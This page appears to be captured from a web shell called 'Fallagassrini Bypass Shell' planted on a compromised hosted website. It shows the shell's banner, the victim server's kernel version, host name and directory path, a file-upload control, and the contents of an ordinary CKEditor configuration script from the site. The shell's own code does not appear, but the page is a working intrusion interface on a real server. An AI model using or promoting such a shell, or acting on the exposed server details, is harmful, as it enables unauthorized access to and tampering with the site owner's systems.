Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/h/a/p/happyrenas/myreco.online/administration/gestion/oldjs/

Linux webd005.cluster105.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Upload File :
Current File : /home/h/a/p/happyrenas/myreco.online/administration/gestion/oldjs/ckeditor.js

//https://ckeditor.com/docs/ckeditor5/latest/builds/guides/integration/configuration.html

"use strict";
// Class definition

var KTCkeditor = function () {    
    // Private functions
    var editeur = function () {
        ClassicEditor
			.create( document.querySelector( '#champ_annexe3_nom' ),
			{
			//toolbar: [ 'heading', '|', 'bold', 'italic', 'bulletedList', 'numberedList', 'blockQuote' ],
			language: 'de'

				
			}
			)
			.then( editor => {
				console.log( editor );
			} )
			.catch( error => {
				console.error( error );
			} );

		
    }

    return {
        // public functions
        init: function() {
            editeur(); 
        }
    };
}();

// Initialization
jQuery(document).ready(function() {
    KTCkeditor.init();
});

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net